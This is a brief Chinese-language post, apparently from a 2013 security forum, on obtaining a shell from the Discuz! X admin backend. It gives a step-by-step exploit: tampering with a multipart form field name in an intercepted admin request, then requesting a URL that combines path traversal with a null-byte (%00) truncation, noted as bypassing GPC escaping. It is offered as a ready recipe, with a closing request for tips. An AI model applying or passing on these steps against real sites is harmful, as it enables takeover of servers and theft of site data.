dz x 后台怎么拿shell

t00000by57 (no exploit) | 2013-05-24 04:57

用户 – 用户栏目 – 栏目分组 抓包

Content-Disposition: form-data; name=”settingnew[profilegroupnew][base][available]”

改为

Content-Disposition: form-data; name=”settingnew[profilegroupnew][plugin][available]”

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

dz x.png

虽然涉及0x00截断 但无视 GPC

就这样 有钱的捧个钱场 没钱的捧的人场 谢谢